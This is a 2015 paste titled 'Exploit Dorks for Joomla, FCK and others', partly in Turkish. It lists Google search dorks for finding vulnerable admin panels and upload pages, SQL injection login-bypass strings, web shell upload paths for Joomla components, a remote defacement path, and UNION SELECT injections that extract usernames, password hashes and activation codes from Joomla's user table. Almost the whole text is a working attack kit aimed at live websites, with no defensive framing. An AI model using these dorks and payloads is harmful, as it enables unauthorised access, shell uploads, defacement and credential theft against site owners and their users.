Exploit Dorks for Joomla,FCK and others 2015 Old but gold


SUBMITTED BY: rickystewart3

DATE: Sept. 21, 2015, 3:37 a.m.

FORMAT: Text only

SIZE: 3.3 kB

HITS: 733

  1. inurl:”/admin/saveannounce_upload.asp”
  2. inurl:”admin/eWebEditor/Upload.asp”
  3. inurl:”UploadFile/upload.asp”
  4. WEBWİZ ACİGİ (RTE UPLOAD ACIGI )
  5. inurl:rte/my_documents/my_files/
  6. inurl:/my_documents/my_files/
  7. exloit: /rte/RTE_popup_file_atch.asp
  8. Editör açığı
  9. inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
  10. EXPLOİT : /Editor/assetmanager/assetmanager.asp
  11. Joomla upload açıgı
  12. inurl index.php?option=com_expose
  13. Exploit: administrator/components/com_expose/uploadimg.php
  14. Uploadin gittigi yer : /components/com_expose/expose/img/
  15. Sitefinity: Login upload açıgı
  16. inurl:”Sitefinity: Login”
  17. exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
  18. Auto Login For Joomla Dork .:old:.
  19. inurl:/administrator/index.php?autologin=1
  20. ---
  21. BYPASS ADMIN ACCESS
  22. Dorks:
  23. Code:
  24. inurl:admin.asp
  25. inurl:adminlogin.aspx
  26. inurl:admin/index.php
  27. inurl:administrator.php
  28. inurl:administrator.asp
  29. inurl:login.asp
  30. inurl:login.aspx
  31. inurl:login.php
  32. inurl:admin/index.php
  33. inurl:adminlogin.aspx
  34. Code:
  35. ‘ or 1=1 –
  36. 1'or’1'=’1
  37. admin’–
  38. ” or 0=0 –
  39. or 0=0 –
  40. ‘ or 0=0 #
  41. ” or 0=0 #
  42. or 0=0 #
  43. ‘ or ‘x’='x
  44. ” or “x”=”x
  45. ‘) or (‘x’='x
  46. ‘ or 1=1–
  47. ” or 1=1–
  48. or 1=1–
  49. ‘ or a=a–
  50. ” or “a”=”a
  51. ‘) or (‘a’='a
  52. “) or (“a”=”a
  53. hi” or “a”=”a
  54. hi” or 1=1 –
  55. hi’ or 1=1 –
  56. hi’ or ‘a’='a
  57. hi’) or (‘a’='a
  58. ----
  59. Joomla Component com_smartformer shell upload
  60. Google Dork inurl:"index.php?option=com_smartformer"
  61. & upload shell.php
  62. Your shell :
  63. http://localhost/components/com_smartformer/files/yourshell.php
  64. ---
  65. Ministry Web Designing Multiple Vulnerabilities
  66. exploit bypass to login:
  67. user: '=' 'or'
  68. pass: '=' 'or'
  69. Vunlerable Sections:
  70. inurl:/downloadcounter/admin/login.php
  71. inurl:/mediaprogram/admin/index.php
  72. inurl:/churchprogram/login.php
  73. ----
  74. (Deface)Exploit (Remote Deface ) Joomla Component
  75. Dork : inurl:index.php?option=com_fabrik
  76. Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
  77. ---
  78. [Priv8] Joomla Com_content exploit - defacing joomla websites
  79. Dork :
  80. inurl:index.php?option=com_content & "/mambots/editors/fckeditor"
  81. Vulnerable File :
  82. mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  83. You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell
  84. ----
  85. exploit joomla "com_artforms" reset password
  86. Dork : inurl:"option com_artforms"
  87. /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
  88. /index.php?option=com_user&view=reset
  89. /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

comments powered by Disqus